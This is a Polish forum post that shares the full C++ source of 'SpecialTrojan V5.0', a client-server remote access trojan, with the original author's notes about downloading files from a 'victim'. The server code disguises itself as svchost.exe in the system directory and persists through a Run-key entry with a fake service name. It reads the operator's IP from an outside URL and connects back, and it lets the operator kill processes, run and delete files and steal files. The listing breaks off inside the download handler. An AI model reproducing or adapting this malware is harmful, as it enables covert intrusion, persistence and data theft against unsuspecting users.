[C++] Trojan/RAT w architekturze klient-serwer

Zbiór ciekawych kodów źródłowych, skryptów i gotowców.
Regulamin forum
-Staraj się poprzedzać nazwę tematu prefiksem z nazwą języka programowania np. [Python] nazwa tematu.
-Wklejaj źródła w znaczniku

Kod: Zaznacz cały

[/b].
-Staraj się w skrócie opisać do czego dane źródło służy.
[b]-Zawsze podaj stronę domową autora (jeśli znasz te informacje)[/b]. Szanujemy cudzą prace!
Awatar użytkownika
F3nix
Posty: 332
Rejestracja: 28 kwie 2015, 20:51

[C++] Trojan/RAT w architekturze klient-serwer

Post autor: F3nix »

Kolejny z odmętów starego dysku kod źródłowy nie mojego autorstwa napisany w C++. Jest to typowy pierwszy trojan / RAT / backdoor, który raczej każdy kiedyś sobie napisał (klient-serwer). Działa na socketach i oczywiście jakby mogło nie zabraknąć w tamtych czasach... posiada funkcje sterowania tacką CD-ROMU... :lol: Jako że widzę tam bibliotekę wininet.h to mogę się tylko domyślać jego wykrywalności...

Info od autora
Author: crAcker


Here is it my Version 5.0 of SpecialTrojan.
That will be my last version of SpecialTrojan i posted here.
It's using a reverse connection.
Credits to: %ebx
I hope it will be useful for some of you.
The code is a bit ugly , but you know already about my desktop.. so you dont need to wait more from me. The FileTransfer function is from %ebx, thanks alot to him, its working really perfect.., i added a search function too, so u can search file's then download any file you want.

P.S: just download function is inserted not upload, so you just can get file's from ur victim.. not send.
Klient

Kod: Zaznacz cały

#include <windows.h>
#include <stdio.h>

#define File 100
#define About 101
#define GetProcesses 1
#define GetFiles 2
#define Refrsh 3
#define ProcS 4
#define Kill 5
#define Download 6
#define FPath 7
#define FileBox 8
#define GetWindow 9
#define Close 10
#define Exec 11
#define Remv 12
#define ExecP 13
#define RemvP 14
#define OpenCD 15
#define CloseCD 16
#define RemoveS 17
#define SPserver 21

HWND WindowProcs;
HWND WindowFiles;
HWND Refresh;
HWND ProcessesBox;
HWND Terminate;
HWND DownLoad;
HWND FilePath;
HWND FilesBox;
HWND GetWindowTitle;
HWND CloseW;
HWND Execute;
HWND Remove;
HWND ExecPath;
HWND RemovePath;
HWND CDopen;
HWND CDclose;
HWND RemoveServer;
HWND WindowTitle;
HWND StopServer;

HANDLE SOCK;
HANDLE Procs;
HANDLE FileS;
HANDLE RecvProc;
HANDLE RecvFiles;

WSADATA wsadata;
SOCKET client, server;

char szClassName[ ] = "SpecialTrojan";
char Text[16] = "Copyright: Onur";
char Command[200];
char Data[260];
char Ready[10];
char Buff[2000000];
int Cursel;
char DFile[50];
char* header[4096];  
char recvBUFF[4096];  
char* filename, * filesize;  
FILE * recvFILE;  
int received = 0;  
char tempstr[4096];  
int count1=1, count2=1, percent;
char LocalFP[MAX_PATH];
char RemoteFP[MAX_PATH];
char check[50];

HANDLE Recv;

int parseARGS(char **args, char *line)
{
  int tmp=0;args[tmp] = strtok( line, ":" );
  while((args[++tmp] = strtok(NULL, ":" ) ) != NULL );
  return tmp - 1;
}

DWORD WINAPI RecvFile(LPVOID)
{  
  if(recv(server, recvBUFF, sizeof(recvBUFF), 0) )
  {      
  if(!strncmp(recvBUFF,"FBEGIN",6)) 
  {
  recvBUFF[strlen(recvBUFF) - 2] = 0;        
  parseARGS(header, recvBUFF);        
  filename = header[1];        
  filesize = header[2];      
  }    
  recvBUFF[0] = 0;      
  recvFILE = fopen (filename,"wb");
  percent = atoi( filesize ) / 100; 
  
  while(!feof(recvFILE))
  {        
  if(recv(server, recvBUFF, 1, 0) != 0 ) 
  {
  if(fwrite(recvBUFF , sizeof(recvBUFF[0]) , 1 , recvFILE) == ERROR)
  {
  MessageBox(NULL, "Error writing file !", "Error", MB_OK | MB_ICONERROR);
  TerminateThread(Recv, 0);
  } 
  
  if(count1 == count2) 
  {            
  printf("33[0;0H"); //move cursor to 0, 0            
  printf( "\33[2J"); //clear line            
  printf("Filename: %s\n", filename);            
  printf("Filesize: %d Kb\n", atoi(filesize) / 1024);            
  printf("Percent : %d%% ( %d Kb)\n",count1 / percent ,count1 / 1024);            
  count1+=percent;          
  }          
  count2++;          
  received++;          
  recvBUFF[0] = 0;      
  }
  } 
  } 
}

BOOL EDbleWindow(BOOL b)
{
   EnableWindow(WindowProcs, b);
   EnableWindow(WindowFiles, b);
   EnableWindow(GetWindowTitle, b);
   EnableWindow(CloseW, b);
   EnableWindow(Execute, b);
   EnableWindow(Remove, b);
   EnableWindow(ExecPath, b);
   EnableWindow(RemovePath, b);
   EnableWindow(CDopen, b);
   EnableWindow(CDclose, b);
   EnableWindow(RemoveServer, b);
   EnableWindow(StopServer, b);
}

DWORD WINAPI WinSock(LPVOID)
{
   if(WSAStartup(MAKEWORD(2, 2), &wsadata) != 0)
   {
   MessageBox(NULL, "Error by initialization !", "Initialization Failed", MB_OK | MB_ICONERROR);
   WSACleanup();
   exit(0);
   }
   
   client = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
   
   if(client == INVALID_SOCKET)
   {
   MessageBox(NULL, "Error by creating socket !", "Socket Error", MB_OK | MB_ICONERROR);
   WSACleanup();
   closesocket(client), (server);
   exit(0);
   }
   
   struct sockaddr_in cln;
   
   cln.sin_port=htons(80);
   cln.sin_addr.s_addr=INADDR_ANY;
   cln.sin_family=AF_INET;
   
   if(bind(client, (sockaddr*)&cln, sizeof(cln)) != 0)
   {
   MessageBox(NULL, "Error by bind socket !", "Bind Error", MB_OK | MB_ICONERROR);
   }
   
   int clnt = sizeof(cln);
   
   listen(client, 0);
   server = accept(client, (sockaddr*)&client, &clnt);
   EDbleWindow(true);
   MessageBox(NULL, "Connected !", "Connected", MB_OK | MB_ICONINFORMATION);
   TerminateThread(SOCK, 0);
}

DWORD WINAPI RecvProcesses(LPVOID)
{
   SendMessage(ProcessesBox, LB_RESETCONTENT, 0, 0);
   send(server, Ready, sizeof(Ready), 0);
   while(recv(server, Data, 200, 0))
   {
   if(!strcmp(Data, "finished"))
   {
   TerminateThread(RecvProc, 0);
   }

   else if(!strcmp(Data, "Successfully"))
   {
   }
   
   else if(!strcmp(Data, "Error"))
   {
   }
   
   else if(!strcmp(Data, ""))
   {
   }

   else
   SendMessage(ProcessesBox, LB_INSERTSTRING, (WPARAM)-1, (LPARAM)Data);
   send(server, Ready, sizeof(Ready), 0);
   }
}

DWORD WINAPI RecvFileS(LPVOID)
{
   SendMessage(FilesBox, LB_RESETCONTENT, 0, 0);
   
   while(recv(server, Data, sizeof(Data), 0))
   {
   if(!strcmp(Data, ""))
   {}
   
   if(!strcmp(Data, "Error"))
   {
   MessageBox(NULL, "Error getting file's !", "Error", MB_OK | MB_ICONERROR);
   strcpy(Data, "");
   TerminateThread(RecvFiles, 0);
   }
   
   if(!strcmp(Data, "finished"))
   {
   strcpy(Data, "");
   TerminateThread(RecvFiles, 0);
   }
   
   else
   {
   SendMessage(FilesBox, LB_INSERTSTRING, (WPARAM)-1, (LPARAM)Data);
   send(server, Ready, sizeof(Ready), 0);
   }
   }
}

LRESULT CALLBACK Processes (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
  switch (message)
  {
  case WM_DESTROY:
  TerminateThread(RecvProc, 0);
  strcpy(Data, "");
  PostQuitMessage (0);
  break;
  
  case WM_CREATE:
  CreateWindowEx(0, "Button", "Refresh", WS_VISIBLE | WS_CHILD | WS_BORDER, 23, 10, 70, 20, hwnd, (HMENU)Refrsh, 0, NULL);
  CreateWindowEx(0, "Button", "Kill", WS_VISIBLE | WS_CHILD | WS_BORDER, 120, 10, 70, 20, hwnd, (HMENU)Kill, 0, NULL);
  ProcessesBox = CreateWindowEx(0, "ListBox", 0, WS_VISIBLE | WS_CHILD | WS_BORDER | WS_VSCROLL | LBS_DISABLENOSCROLL, 15, 35, 183, 235, hwnd, (HMENU)ProcS, 0, NULL);
  break;
  
  case WM_COMMAND:
  switch(LOWORD(wParam))
  {
  case Refrsh:
  strcpy(Command, "GetProcesses");
  send(server, Command, 20, 0);
  TerminateThread(RecvProc, 0);
  RecvProc = CreateThread(NULL, 0, RecvProcesses, 0, 0, NULL);
  break;
  
  case Kill:
  if(MessageBox(NULL, "Are you sure, you want to terminate the process ?", "Terminate Process", MB_YESNO | MB_ICONQUESTION) == IDYES)
  {          
  strcpy(Command, "Kill");
  send(server, Command, sizeof(Command), 0);

  Cursel = SendMessage(ProcessesBox, LB_GETCURSEL, 0, 0);
  SendMessage(ProcessesBox, LB_GETTEXT, (WPARAM)Cursel, (LPARAM)Data);

  send(server, Data, sizeof(Data), 0);
  recv(server, Data, sizeof(Data), 0);
  
  if(!strcmp(Data, "Error"))
  {
  MessageBox(NULL, "Error by killig process !", "Error", MB_OK | MB_ICONERROR);
  }
  
  else
  {
  SendMessage(ProcessesBox, LB_DELETESTRING, (WPARAM)Cursel, 0);
  MessageBox(NULL, "Process killed succesfully !", "Process Killed", MB_OK | MB_ICONINFORMATION);
  }
  }
  break;
  }
  
  default:
  return DefWindowProc (hwnd, message, wParam, lParam);
  }
}

DWORD WINAPI PWindow(LPVOID)
{
  HWND hwnd;
  MSG messages;
  WNDCLASSEX wincl;

  wincl.hInstance = 0;
  wincl.lpszClassName = "Processes";
  wincl.lpfnWndProc = Processes;
  wincl.style = CS_DBLCLKS;
  wincl.cbSize = sizeof (WNDCLASSEX);

  wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
  wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);
  wincl.hCursor = LoadCursor (NULL, IDC_ARROW);
  wincl.lpszMenuName = NULL;
  wincl.cbClsExtra = 0;
  wincl.cbWndExtra = 0;
  wincl.hbrBackground = (HBRUSH) COLOR_BACKGROUND+4;

  RegisterClassEx(&wincl);

  hwnd = CreateWindowEx (
      0,
      "Processes",
      "Processes",
      WS_SYSMENU | WS_VISIBLE,
      CW_USEDEFAULT,
      CW_USEDEFAULT,
      220,
      300,
      HWND_DESKTOP,
      NULL,
      0,
      NULL
      );

  while (GetMessage (&messages, NULL, 0, 0))
  {
    TranslateMessage(&messages);
    DispatchMessage(&messages);
  }
}

LRESULT CALLBACK Files (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
  switch (message)
  {
  case WM_DESTROY:
  TerminateThread(Recv, 0), TerminateThread(RecvFiles, 0);
  if(!strcmp(check, "DownloadAktiv"))
  {
  fclose(recvFILE);
  strcpy(check, "");
  }
  PostQuitMessage (0);
  break;
  
  case WM_CREATE: 
  CreateWindowEx(0, "Button", "Get Files", WS_VISIBLE | WS_CHILD | WS_BORDER, 8, 10, 80, 20, hwnd, (HMENU)GetFiles, 0, NULL);
  CreateWindowEx(0, "Button", "Download", WS_VISIBLE | WS_CHILD | WS_BORDER, 125, 10, 80, 20, hwnd, (HMENU)Download, 0, NULL);
  CreateWindowEx(0, "Edit", "C:\\WINDOWS\\*.txt", WS_VISIBLE | WS_CHILD | WS_BORDER | ES_AUTOHSCROLL, 8, 35, 197, 18, hwnd, (HMENU)FPath, 0, NULL);
  FilesBox = CreateWindowEx(0, "ListBox", 0, WS_VISIBLE | WS_CHILD | WS_BORDER | WS_VSCROLL | LBS_DISABLENOSCROLL, 8, 57, 198, 209, hwnd, (HMENU)FileBox, 0, NULL);
  break;
  
  case WM_COMMAND:
  switch(LOWORD(wParam))
  {
  case GetFiles:
  strcpy(Command, "GetFiles");
  send(server, Command, 20, 0);
  GetDlgItemText(hwnd, FPath, Data, sizeof(Data));
  send(server, Data, sizeof(Data), 0);
  TerminateThread(RecvFiles, 0);
  RecvFiles = CreateThread(NULL, 0, RecvFileS, 0, 0, NULL);
  break;

  case Download:
  strcpy(Command, "Download");
  send(server, Command, 20, 0);
  strcpy(check, "DownloadAktiv");
  Cursel = SendMessage(FilesBox, LB_GETCURSEL, 0, 0);
  SendMessage(FilesBox, LB_GETTEXT, (WPARAM)Cursel, (LPARAM)DFile);
  GetDlgItemText(hwnd, FPath, Data, sizeof(Data));
  
  if(!strcmp(Data, ""))
  {
  strcpy(Data, "Error");
  send(server, Data, 8, 0);
  MessageBox(NULL, "You doesn't typed the path of the file to download !", "Donwload", MB_OK | MB_ICONWARNING);
  TerminateThread(FileS, 0);
  }
  
  if(!strcmp(DFile, ""))
  {
  strcpy(Data, "Error");
  send(server, Data, 8, 0);
  MessageBox(NULL, "You doesn't selected a file to download !", "Download", MB_OK | MB_ICONWARNING);
  TerminateThread(FileS, 0);
  }
  
  send(server, Data, sizeof(Data), 0);
  Sleep(10);
  send(server, DFile, sizeof(DFile), 0);
  
  Recv = CreateThread(NULL, 0, RecvFile, 0, 0, NULL);
  break;
  }
  
  default:
  return DefWindowProc (hwnd, message, wParam, lParam);
  }
}

DWORD WINAPI FWindow(LPVOID)
{
  HWND hwnd;
  MSG messages;
  WNDCLASSEX wincl;

  wincl.hInstance = 0;
  wincl.lpszClassName = "Files";
  wincl.lpfnWndProc = Files;
  wincl.style = CS_DBLCLKS;
  wincl.cbSize = sizeof (WNDCLASSEX);

  wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
  wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);
  wincl.hCursor = LoadCursor (NULL, IDC_ARROW);
  wincl.lpszMenuName = NULL;
  wincl.cbClsExtra = 0;
  wincl.cbWndExtra = 0;
  wincl.hbrBackground = (HBRUSH) COLOR_BACKGROUND+4;

  RegisterClassEx(&wincl);

  hwnd = CreateWindowEx (
      0,
      "Files",
      "Files",
      WS_SYSMENU | WS_VISIBLE,
      CW_USEDEFAULT,
      CW_USEDEFAULT,
      220,
      292,
      HWND_DESKTOP,
      NULL,
      0,
      NULL
      );

  while (GetMessage (&messages, NULL, 0, 0))
  {
    TranslateMessage(&messages);
    DispatchMessage(&messages);
  }
}

LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);

int WINAPI WinMain (HINSTANCE hThisInstance,
          HINSTANCE hPrevInstance,
          LPSTR lpszArgument,
          int nFunsterStil)

{
  SOCK = CreateThread(NULL, 0, WinSock, 0, 0, NULL);
  
  HWND hwnd;
  MSG messages;
  WNDCLASSEX wincl;

  wincl.hInstance = hThisInstance;
  wincl.lpszClassName = szClassName;
  wincl.lpfnWndProc = WindowProcedure;
  wincl.style = CS_DBLCLKS;
  wincl.cbSize = sizeof (WNDCLASSEX);

  wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
  wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);
  wincl.hCursor = LoadCursor (NULL, IDC_ARROW);
  wincl.lpszMenuName = NULL;
  wincl.cbClsExtra = 0;
  wincl.cbWndExtra = 0;
  wincl.hbrBackground = (HBRUSH) COLOR_BACKGROUND+4;

  if (!RegisterClassEx (&wincl))
    return 0;

  hwnd = CreateWindowEx (
      0,
      szClassName,
      "SpecialTrojan V 5.0",
      WS_SYSMENU | WS_MINIMIZEBOX,
      CW_USEDEFAULT,
      CW_USEDEFAULT,
      250,
      300,
      HWND_DESKTOP,
      NULL,
      hThisInstance,
      NULL
      );

  ShowWindow (hwnd, nFunsterStil);

  while (GetMessage (&messages, NULL, 0, 0))
  {
    TranslateMessage(&messages);
    DispatchMessage(&messages);
  }

  return messages.wParam;
}


LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
  HMENU hMenu;
  HMENU hMenuInfo1;
  HMENU hMenuInfo2;
    
  PAINTSTRUCT ps;
  HDC hdc;
    
  switch (message)
  {
  case WM_DESTROY:
  strcpy(Command, "bye");
  send(server, Command, 8, 0);
  PostQuitMessage (0);
  break;
  
  case WM_PAINT:
  hdc = BeginPaint(hwnd, &ps);
  
  TextOut(hdc, 133, 223, Text, sizeof(Text) - 1);
  EndPaint(hwnd, &ps) ;
  break;
  
  case WM_CREATE:    
  hMenu = CreateMenu();
  hMenuInfo1 = CreateMenu();
  hMenuInfo2 = CreateMenu();
  AppendMenu(hMenuInfo1, MF_STRING, File, "Exit");
  AppendMenu(hMenu, MF_POPUP, (UINT) hMenuInfo1, "File");
  AppendMenu(hMenuInfo2, MF_STRING, About, "About");
  AppendMenu(hMenu, MF_POPUP, (UINT) hMenuInfo2, "Info");
  SetMenu(hwnd, hMenu);
     
  WindowProcs = CreateWindowEx(0, "Button", "Processes", WS_VISIBLE | WS_CHILD | WS_BORDER, 10, 5, 80, 22, hwnd, (HMENU)GetProcesses, 0, NULL);
  WindowFiles = CreateWindowEx(0, "Button", "Files", WS_VISIBLE | WS_CHILD | WS_BORDER, 153, 5, 80, 22, hwnd, (HMENU)GetFiles, 0, NULL);
  GetWindowTitle = CreateWindowEx(0, "Button", "Get Window", WS_VISIBLE | WS_CHILD | WS_BORDER, 73, 35, 95, 22, hwnd, (HMENU)GetWindow, 0, NULL);
  WindowTitle = CreateWindowEx(0, "Edit", 0, WS_VISIBLE | WS_CHILD | WS_BORDER | ES_READONLY, 7, 58, 230, 18, hwnd, 0, 0, NULL);
  CloseW = CreateWindowEx(0, "Button", "Close", WS_VISIBLE | WS_CHILD | WS_BORDER, 73, 78, 95, 22, hwnd, (HMENU)Close, 0, NULL);
  Execute = CreateWindowEx(0, "Button", "Execute", WS_VISIBLE | WS_CHILD | WS_BORDER, 10, 105, 65, 22, hwnd, (HMENU)Exec, 0, NULL);
  Remove = CreateWindowEx(0, "Button", "Remove", WS_VISIBLE | WS_CHILD | WS_BORDER, 10, 155, 65, 22, hwnd, (HMENU)Remv, 0, NULL);
  ExecPath = CreateWindowEx(0, "Edit", 0, WS_VISIBLE | WS_CHILD | WS_BORDER | ES_AUTOHSCROLL, 10, 130, 150, 18, hwnd, (HMENU)ExecP, 0, NULL);
  RemovePath = CreateWindowEx(0, "Edit", 0, WS_VISIBLE | WS_CHILD | WS_BORDER | ES_AUTOHSCROLL, 10, 180, 150, 18, hwnd, (HMENU)RemvP, 0, NULL);
  CDopen = CreateWindowEx(0, "Button", "Open CD", WS_VISIBLE | WS_CHILD | WS_BORDER, 167, 118, 72, 22, hwnd, (HMENU)OpenCD, 0, NULL);
  CDclose = CreateWindowEx(0, "Button", "Close CD", WS_VISIBLE | WS_CHILD | WS_BORDER, 167, 155, 72, 22, hwnd, (HMENU)CloseCD, 0, NULL);
  StopServer = CreateWindowEx(0, "Button", "Stop Server", WS_VISIBLE | WS_CHILD | WS_BORDER, 10, 200, 100, 22, hwnd, (HMENU)SPserver, 0, NULL);
  RemoveServer = CreateWindowEx(0, "Button", "Remove Server", WS_VISIBLE | WS_CHILD | WS_BORDER, 10, 220, 115, 25, hwnd, (HMENU)RemoveS, 0, NULL);
  
  EDbleWindow(false);
  break;

  case WM_COMMAND:
     
  switch(LOWORD(wParam))
  {
  if(HIWORD(wParam) == 0) 
  { 
  case File:
  strcpy(Command, "bye");
  send(server, Command, 5, 0);
  PostQuitMessage(0);
  break;
  
  case About:
  MessageBox(NULL, "SpecialTrojan Version 5.0\nRemote Access Trojan® -2007\n\nCopyright© : Onur\n\ncontact: mafiaonur@yahoo.de", "About", MB_OK | MB_ICONINFORMATION);
  break;
  }

  case GetProcesses:
  TerminateThread(Procs, 0);
  Procs = CreateThread(NULL, 0, PWindow, 0, 0, NULL);
  TerminateThread(RecvProc, 0);
  RecvProc = CreateThread(NULL, 0, RecvProcesses, 0, 0, NULL);
  strcpy(Command, "GetProcesses");
  send(server, Command, 20, 0);
  break;
  
  case GetFiles:
  TerminateThread(FileS, 0);
  FileS = CreateThread(NULL, 0, FWindow, 0, 0, NULL);
  break;
  
  case GetWindow: 
  strcpy(Command, "GetWindow");
  send(server, Command, 15, 0);
  recv(server, Data, sizeof(Data), 0);
  SetWindowText(WindowTitle, Data);
  break;
  
  case Close:
  strcpy(Command, "CloseWindow");
  send(server, Command, 20, 0);
  MessageBox(NULL, "Current window closed !", "Close Window", MB_OK | MB_ICONINFORMATION);
  break;
  
  case Exec:
  strcpy(Command, "Execute");
  send(server, Command, 15, 0);
  GetDlgItemText(hwnd, ExecP, Data, sizeof(Data));
  if(!strcmp(Data, ""))
  {
  MessageBox(NULL, "Execute path is empty !", "Execute", MB_OK | MB_ICONWARNING);
  send(server, Data, 10, 0);
  }
  
  else
  {
  send(server, Data, sizeof(Data), 0);
  MessageBox(NULL, "File executed !", "Execute", MB_OK | MB_ICONINFORMATION);
  }
  break;
  
  case Remv:
  strcpy(Command, "Remove");
  send(server, Command, 15, 0);
  GetDlgItemText(hwnd, RemvP, Data, sizeof(Data));
  if(!strcmp(Data, ""))
  {
  MessageBox(NULL, "Remove path is empty !", "Remove", MB_OK | MB_ICONINFORMATION);
  send(server, Data, sizeof(Data), 0);
  }
  
  else
  {
  send(server, Data, sizeof(Data), 0);
  recv(server, Data, 20, 0);
  if(!strcmp(Data, "Error"))
  {
  MessageBox(NULL, "Error by removing file !", "Remove", MB_OK | MB_ICONWARNING);
  }
  
  else
  {
  MessageBox(NULL, "File removed successfully !", "Remove", MB_OK | MB_ICONINFORMATION);
  }
  }
  break;
  
  case OpenCD:
  strcpy(Command, "OpenCD");
  send(server, Command, 10, 0);
  MessageBox(NULL, "CD-ROM opened !", "CD-ROM", MB_OK | MB_ICONINFORMATION);
  break;
  
  case CloseCD:
  strcpy(Command, "CloseCD");
  send(server, Command, 10, 0);
  MessageBox(NULL, "CD-ROM closed !", "CD-ROM", MB_OK | MB_ICONINFORMATION);
  break;
  
  case SPserver:
  strcpy(Command, "stop");
  send(server, Command, 10, 0);
  EDbleWindow(false);
  MessageBox(NULL, "Server stopped !", "Stop Server", MB_OK | MB_ICONINFORMATION);
  break;
  
  case RemoveS:
  strcpy(Command, "Uninstall");
  send(server, Command, 20, 0);
  recv(server, Data, 20, 0);
  
  if(!strcmp(Data, "Error"))
  {
  MessageBox(NULL, "Failed to remove the server !", "Remove Server", MB_OK | MB_ICONWARNING);
  }
  
  else
  {
  EDbleWindow(false);
  TerminateThread(SOCK, 0);
  TerminateThread(Procs, 0);
  TerminateThread(FileS, 0);
  TerminateThread(RecvProc, 0);
  TerminateThread(RecvFiles, 0);
  TerminateThread(Recv, 0);
  MessageBox(NULL, "Server removed successfully !", "Remove Server", MB_OK | MB_ICONINFORMATION);
  }
  break;
  }
  
  default:
  return DefWindowProc (hwnd, message, wParam, lParam);
  }

  return 0;
}
Serwer

Kod: Zaznacz cały

#include <windows.h>
#include <wininet.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <vector>
#include <string>
#define backlog 1
using namespace std;

BOOL KillProcessByName(char *szProcessToKill);

typedef BOOL (WINAPI *TH32_PROCESS) 
       (HANDLE hSnapShot, LPPROCESSENTRY32 lppe); 
       
static TH32_PROCESS pProcess32First = NULL; 
static TH32_PROCESS pProcess32Next = NULL; 

HINTERNET hInet2, hFtp2;

char Server[MAX_PATH];
char ServerDir[MAX_PATH];
char Command[200];
char Data[260];
char IP[20];
DWORD size;
char Ready[20];
char DFile[50];
char* header[4096];  
char recvBUFF[4096];  
char* filename, * filesize;  
FILE * recvFILE;  
int received = 0;  
char tempstr[4096];  
int count1=1, count2=1, percent;

WSADATA wsadata;
SOCKET client, server; 

int fileSEND(char *lfile, char *rfile)
{  
  FILE * file_to_send;  
  int ch;  
  char toSEND[1];  
  char remoteFILE[4096];  
  int count1=1,count2=1, percent;    
 
  file_to_send = fopen(lfile,"rb");  
   
  long fileSIZE;  
  fseek(file_to_send, 0, SEEK_END);
  fileSIZE =ftell (file_to_send);  
  rewind(file_to_send);  
  sprintf(remoteFILE, "FBEGIN:%s:%d\r\n", rfile, fileSIZE);  
  send(client, remoteFILE, sizeof(remoteFILE), 0);  
  percent = fileSIZE / 100;  
  while((ch=getc(file_to_send))!=EOF)
  {
  toSEND[0] = ch;    
  send(client, toSEND, 1, 0);    
  if( count1 == count2) 
  {      
  printf("33[0;0H");      
  printf( "\33[2J");      
  printf("Filename: %s\n", lfile);      
  printf("Filesize: %d Kb\n", fileSIZE / 1024);      
  printf("Percent : %d%% ( %d Kb)\n",count1 / percent ,count1 / 1024);      
  count1+=percent;    
  }    
  count2++;  
  }   
  fclose(file_to_send); 
  return 0;
}

int parseARGS(char **args, char *line)
{
  int tmp=0;args[tmp] = strtok( line, ":" );
  while((args[++tmp] = strtok(NULL, ":" ) ) != NULL );
  return tmp - 1;
}

void StartUp()
{
   HMODULE GetModH = GetModuleHandle(NULL);
   
   GetModuleFileName(GetModH, Server, sizeof(Server));
   GetSystemDirectory(ServerDir, sizeof(ServerDir));
   
   strcat(ServerDir, "\\win32");
   CreateDirectory(ServerDir, 0);
   strcat(ServerDir, "\\svchost.exe");
   
   if(!strcmp(Server, ServerDir))
   {
   goto key;
   }
   
   else
   {  
   CopyFile(Server, ServerDir, 0);
   }
   
   key:
   
   HKEY hKey;
   
   RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey);
   RegSetValueEx(hKey, "Generic Host Process for Win32 Services", 0, REG_SZ,(const unsigned char*)ServerDir, sizeof(ServerDir));
   RegCloseKey(hKey);
}

void RecvCommands()
{
   while(1)
   {
   recv(client, Command, sizeof(Command), 0);
   
   if(!strcmp(Command, "bye"))
   {
   WSACleanup();
   closesocket(client);
   Sleep(200);
   
   TryAgain:
   
   closesocket(client), (server);
          
   Sleep(5000);
   
   HINTERNET hInet = InternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
   
   if(hInet == NULL)
   {
   InternetCloseHandle(hInet);
   goto TryAgain;
   }
   
   /* Edit the url, u need to give the url of ur ip !!! */
   
   HINTERNET hFile = InternetOpenUrl(hInet, "http://hackerswelcome.ha.funpic.de/ip.txt", NULL, 0, 0, 0);
   
   InternetReadFile(hFile, IP, 20, &size);
   
   InternetCloseHandle(hInet), (hFile);
   
   if(WSAStartup(MAKEWORD(2, 2), &wsadata) != 0)
   {
   WSACleanup();
   goto TryAgain;
   }
   
   client = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
   
   if(client == INVALID_SOCKET)
   {
   WSACleanup();
   closesocket(client);
   goto TryAgain;
   }
   
   sockaddr_in clnt;
   
   clnt.sin_port=htons(80);
   clnt.sin_addr.s_addr=inet_addr(IP);
   clnt.sin_family=AF_INET;
         
   if(connect(client,(sockaddr*)&clnt, sizeof(clnt)) == SOCKET_ERROR)
   {
   WSACleanup();
   closesocket(client), (server);
   goto TryAgain;
   }
   }
   
   if(!strcmp(Command, "GetProcesses"))
   {
   recv(client, Ready, sizeof(Ready), 0);
   
   PROCESSENTRY32 pe32 = {0}; 
   HANDLE hSnapshot = NULL; 
   HINSTANCE hDll = LoadLibrary("kernel32.dll"); 
    
   pProcess32First=(TH32_PROCESS)GetProcAddress(hDll, "Process32First"); 
   pProcess32Next=(TH32_PROCESS)GetProcAddress(hDll, "Process32Next"); 
     
   hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);        
   if(hSnapshot != (HANDLE) -1) 
   { 
   pe32.dwSize = sizeof(PROCESSENTRY32); 
   int proc_cnt = 0, thrd_cnt = 0;
     
   if(pProcess32First(hSnapshot, &pe32)) 
   { 
   do 
   { 
   strcpy(Data, pe32.szExeFile);
   send(client, Data, 200, 0);
   recv(client, Ready, sizeof(Ready), 0);
   } 
   while(pProcess32Next(hSnapshot, &pe32)); 
   CloseHandle(hSnapshot);
   }
   }
   strcpy(Data, "finished");
   send(client, Data, 200, 0);
   }
   
   if(!strcmp(Command, "Kill"))
   {
   recv(client, Data, sizeof(Data), 0);
   KillProcessByName(Data);
   }
   
   if(!strcmp(Command, "Execute"))
   {
   recv(client, Data, sizeof(Data), 0);
   ShellExecute(NULL, NULL, Data, NULL, NULL, SW_SHOW);
   }
   
   if(!strcmp(Command, "Remove"))
   {
   recv(client, Data, sizeof(Data), 0);
   if(DeleteFile(Data) == ERROR)
   {
   strcpy(Data, "Error");
   send(client, Data, 10, 0);
   }
   
   else
   {
   strcpy(Data, "Succesfully");
   send(client, Data, 20, 0);
   }
   }
   
   if(!strcmp(Command, "OpenCD"))
   {
   mciSendString("set CDAudio door open", NULL, 0, NULL);
   }
   
   if(!strcmp(Command, "CloseCD"))
   {
   mciSendString("set CDAudio door closed", NULL, 0, NULL);
   }
   
   if(!strcmp(Command, "CloseWindow"))
   {
   HWND Window = GetForegroundWindow();
   SendMessage(Window, WM_CLOSE, 0, 0);
   }
   
   if(!strcmp(Command, "GetWindow"))
   {
   HWND Window = GetForegroundWindow();
   GetWindowText(Window, Data, MAX_PATH);
   send(client, Data, sizeof(Data), 0);
   }
   
   if(!strcmp(Command, "Uninstall"))
   {
   HKEY hKey;
   
   RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey); 
   if(RegDeleteValue(hKey, "Generic Host Process for Win32 Services") != ERROR)
   {
   strcpy(Data, "Error");
   send(client, Data, 10, 0);
   }
   
   else
   {
   strcpy(Data, "Succesfully");
   send(client, Data, 20, 0);
   WSACleanup();
   closesocket(server), (client);
   exit(0);
   }
   }
   
   if(!strcmp(Command, "GetFiles"))
   {
   recv(client, Data, sizeof(Data), 0);
   
   std::vector<std::string> dir; 
   WIN32_FIND_DATA data; 
   HANDLE hFile = FindFirstFileA(Data, &data); 
   
   if(hFile == INVALID_HANDLE_VALUE) 
   {
   strcpy(Data, "Error");
   send(client, Data, sizeof(Data), 0);
   }
   
   do{
   
   if(data.dwFileAttributes)
   {
   strcpy(Data, data.cFileName);
   send(client, Data, sizeof(Data), 0);
   recv(client, Ready, sizeof(Ready), 0);
   dir.push_back(std::string(data.cFileName));
   }
   }
   while(FindNextFile(hFile, &data));
   strcpy(Data, "finished");
   send(client, Data, sizeof(Data), 0);
   }
   
   if(!strcmp(Command, "Download"))
   {
   recv(client, Data, sizeof(Data), 0);
   recv(client, DFile, sizeof(DFile), 0);
